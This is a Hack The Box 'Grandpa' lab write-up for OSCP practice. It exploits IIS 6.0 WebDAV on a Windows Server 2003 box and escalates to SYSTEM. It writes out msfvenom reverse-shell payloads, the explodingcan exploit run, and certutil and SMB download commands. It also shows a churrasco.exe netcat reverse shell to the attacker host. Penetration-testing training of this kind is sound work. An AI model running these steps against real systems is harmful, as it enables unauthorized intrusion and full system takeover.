In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Nmap scan
# Nmap 7.94 scan initiated Fri Oct 20 19:38:35 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/HTB/grandpa/results/10.10.10.14/scans/_full_tcp_nmap.txt -oX /home/kali/HTB/grandpa/results/10.10.10.14/scans/xml/_full_tcp_nmap.xml 10.10.10.14
Nmap scan report for 10.10.10.14
Host is up, received user-set (0.34s latency).
Scanned at 2023-10-20 19:38:42 EDT for 336s
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 6.0
|_http-title: Under Construction
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT POST MOVE MKCOL PROPPATCH
|_ Potentially risky methods: TRACE COPY PROPFIND SEARCH LOCK UNLOCK DELETE PUT MOVE MKCOL PROPPATCH
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan:
| Server Date: Fri, 20 Oct 2023 23:44:12 GMT
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
| Server Type: Microsoft-IIS/6.0
|_ Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Oct 20 19:44:18 2023 -- 1 IP address (1 host up) scanned in 343.34 seconds
edit hosts file
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.10.10.175 EGOTISTICAL-BANK.LOCAL
10.10.10.100 active.htb htb
10.10.10.192 blackfield.local
10.10.10.182 cascade.local
10.10.11.152 timelapse.htb
10.10.10.52 htb.local mantis.htb.local
10.10.10.179 MEGACORP.LOCAL MULTIMASTER.MEGACORP.LOCAL
10.10.10.172 MEGABANK.LOCAL MONTEVERDE.MEGABANK.LOCAL
10.10.10.248 intelligence.htb dc.intelligence.htb
192.168.173.165 heist.offsec DC01.heist.offsec
10.10.10.15 granny
10.10.10.14 grandpa
Tried to put files in all directories but all failed
Searchsploit IIS6
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service | windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065) | windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow | windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass | windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1) | windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2) | windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch) | windows/remote/8754.patch
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities | windows/remote/19033.txt
did a search for ScStoragePathFromUrl on google and found this on github –> https://github.com/danigargu/explodingcan/tree/master
downloaded the script
The usage instructions for creating the shellcode is
$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=172.16.20.1 LPORT=4444 >shellcode
created the shellcode
╰─$ msfvenom -p windows/meterpreter/reverse_tcp -f raw -v sc -e x86/alpha_mixed LHOST=10.10.14.2 LPORT=443 >shellcode
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/alpha_mixed
x86/alpha_mixed succeeded with size 770 (iteration=0)
x86/alpha_mixed chosen with final size 770
Payload size: 770 bytes
╭─kali@kali ~/HTB/grandpa
╰─$
Because it is meterpreter shellcode, well set up multi handler
╰─$ msfconsole
, ,
/ \
((__---,,,---__))
(_) O O (_)_________
\ _ / |\
o_o \ M S F | \
\ _____ | *
||| WW|||
||| |||
=[ metasploit v6.3.31-dev ]
+ -- --=[ 2346 exploits - 1220 auxiliary - 413 post ]
+ -- --=[ 1390 payloads - 46 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit tip: Use the resource command to run
commands from a file
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.2
LHOST => 10.10.14.2
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.14.2 yes The listen address (an interface may be specified)
LPORT 443 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
View the full module info with the info, or info -d command.
msf6 exploit(multi/handler) >
we run and get a meterpreter
╰─$ python explodingcan.py http://10.10.10.14 shellcode
Traceback (most recent call last):
File "/home/kali/HTB/grandpa/explodingcan.py", line 16, in <module>
import httplib
ModuleNotFoundError: No module named 'httplib'
╭─kali@kali ~/HTB/grandpa
╰─$ python2.7 explodingcan.py http://10.10.10.14 shellcode 1 ↵
[*] Using URL: http://10.10.10.14
[*] Server found: Microsoft-IIS/6.0
[*] Found IIS path size: 18
[*] Default IIS path: C:\Inetpub\wwwroot
[*] WebDAV request: OK
[*] Payload len: 2280
[*] Sending payload...
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.10.14.2:443
[*] Sending stage (175686 bytes) to 10.10.10.14
[*] Meterpreter session 1 opened (10.10.14.2:443 -> 10.10.10.14:1030) at 2023-10-20 21:12:00 -0400
meterpreter >
meterpreter > shell
Process 1176 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>
systeminfo
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: GRANPA
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 0 Hours, 25 Minutes, 46 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 23 Model 49 Stepping 0 AuthenticAMD ~2994 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 739 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,284 MB
Page File: In Use: 186 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A
checking for vulnurability
╭─kali@kali ~/HTB/grandpa/Windows-Exploit-Suggester ‹master●›
╰─$ python2.7 ./windows-exploit-suggester.py --database 2023-10-18-mssb.xls --systeminfo sys.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
checking whoami, i see seIpmepers… So i will try juicy potato
created shell
╰─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 -a x86 --platform windows LPORT=443 EXITFUNC=thread -f exe -o shell.exe
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: shell.exe
╭─kali@kali ~/HTB/grandpa/Windows-Exploit-Suggester ‹master●›
serve and upload the two files
╭─kali@kali ~/HTB/grandpa
╰─$ ls
41738.py fpcount.exe shellcode shellcode_3 test.gif
8765.php JuicyPotato.exe shellcode_1 shellcode.bin test.txt
explodingcan.py results shellcode_2 shell.exe Windows-Exploit-Suggester
╭─kali@kali ~/HTB/grandpa
╰─$ serve 900
Starting HTTP server on port 900...
====================================
certutil -urlcache -f http://10.10.14.2:900/file_to_download.txt C:\path\where\you\lile.txt
Invoke-WebRequest -Uri http://10.10.14.2:900/file_to_download.txt -OutFile C:\path\lile.txt
====================================
Serving HTTP on 0.0.0.0 port 900 (http://0.0.0.0:900/) ...
certutil -urlcache -f http://10.10.14.2:80/shell.exe C:\wmpub\shell.exe
certutil -urlcache -f http://10.10.14.2:80/shell.exe C:\Inetpub\wwwroot\shell.exe
certutil -urlcache -f http://10.10.14.2:900/JuicyPotato.exe C:\temp\JuicyPotato.exe
cerutil fails
C:\Inetpub\wwwroot>certutil -urlcache -f http://10.10.14.2:80/shell.exe C:\Inetpub\wwwroot\shell.exe
certutil -urlcache -f http://10.10.14.2:80/shell.exe C:\Inetpub\wwwroot\shell.exe
CertUtil: -URLCache command FAILED: 0x80070057 (WIN32: 87)
CertUtil: The parameter is incorrect.
well try smb. We serve the file
╭─kali@kali /usr/share/doc/python3-impacket/examples
╰─$ ./smbserver.py -smb2support myshare /home/kali/HTB/grandpa
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
copy[*] Incoming connection (10.10.10.14,1032)
Traceback (most recent call last):
File "/usr/lib/python3/dist-packages/impacket/smbserver.py", line 4439, in processRequest
respCommands, respPackets, errorCode = self.__smb2Commands[smb2.SMB2_NEGOTIATE](
we copy the shell and juicy
copy \\10.10.14.2\myshare\shell.exe /Y
copy \\10.10.14.2\myshare\JuicyPotato.exe /Y
C:\temp>copy \\10.10.14.2\myshare\shell.exe /Y
copy \\10.10.14.2\myshare\shell.exe /Y
1 file(s) copied.
and
C:\temp>copy \\10.10.14.2\myshare\JuicyPotato.exe /Y
copy \\10.10.14.2\myshare\JuicyPotato.exe /Y
1 file(s) copied.
copy \\10.10.14.2\myshare\Juicy.Potato.x86.exe /Y
we listen on 443 and run juicy potato
.\Juicy.Potato.x86.exe -l 80 -p C:\temp\shell1.exe -t *
.\Juicy.Potato.x86.exe -t * -p .\shell1.exe -l 80 -c {5B3E6773-3A99-4A3D-8096-7765DD11785C}
this keept failing
well tyr the same exploit we used in granny
Copy churasco, nc and shell to the temp folder
Copy the files to grandpa
╭─kali@kali ~/HTB/granny
╰─$ ls
35474.py nc.exe reverse86.exe.gif shell86.aspx.txt
64.dll results run.bat sys.txt
churrasco.exe reverse64.exe run.bat.txt test.gif
churrasco.exe.1 reverse64.exe.gif shell64.aspx test.txt
ferox-http_10_10_10_15:80_-1697779932.state reverse86.exe shell86.aspx Windows-Exploit-Suggester
╭─kali@kali ~/HTB/granny
╰─$ cp churrasco.exe ~/HTB/grandpa
╭─kali@kali ~/HTB/granny
╰─$ cp nc.exe ~/HTB/grandpa
╭─kali@kali ~/HTB/granny
╰─$
copy the files to grandpa
copy \\10.10.14.2\myshare\nc.exe /Y
copy \\10.10.14.2\myshare\churrasco.exe /Y
C:\>cd temp
cd temp
C:\temp>copy \\10.10.14.2\myshare\nc.exe /Y
copy \\10.10.14.2\myshare\nc.exe /Y
1 file(s) copied.
C:\temp>copy \\10.10.14.2\myshare\churrasco.exe /Y
copy \\10.10.14.2\myshare\churrasco.exe /Y
1 file(s) copied.
C:\temp>dir
dir
Volume in drive C has no label.
Volume Serial Number is FDCB-B9EF
Directory of C:\temp
10/21/2023 06:13 AM <DIR> .
10/21/2023 06:13 AM <DIR> ..
10/21/2023 06:12 AM 31,232 churrasco.exe
10/21/2023 05:44 AM 263,680 Juicy.Potato.x86.exe
10/21/2023 04:49 AM 347,648 JuicyPotato.exe
10/21/2023 06:12 AM 59,392 nc.exe
10/21/2023 04:50 AM 73,802 shell.exe
10/21/2023 05:58 AM 73,802 shell1.exe
10/21/2023 04:56 AM 19 test.txt
7 File(s) 849,575 bytes
2 Dir(s) 1,293,881,344 bytes free
C:\temp>
command
.\churrasco.exe -d "C:\temp\nc.exe 10.10.14.2 80 -e cmd.exe"
C:\temp>.\churrasco.exe -d "C:\temp\nc.exe 10.10.14.2 80 -e cmd.exe"
.\churrasco.exe -d "C:\temp\nc.exe 10.10.14.2 80 -e cmd.exe"
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 684
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x734
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found SYSTEM token 0x72c
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM!
C:\temp>
we get admin
╭─kali@kali ~/HTB/grandpa
╰─$ nc -nlvp 80 1 ↵
listening on [any] 80 ...
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.14] 1058
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\DOCUME~1\NETWOR~1\LOCALS~1\Temp>whoami
whoami
nt authority\system
C:\DOCUME~1\NETWOR~1\LOCALS~1\Temp>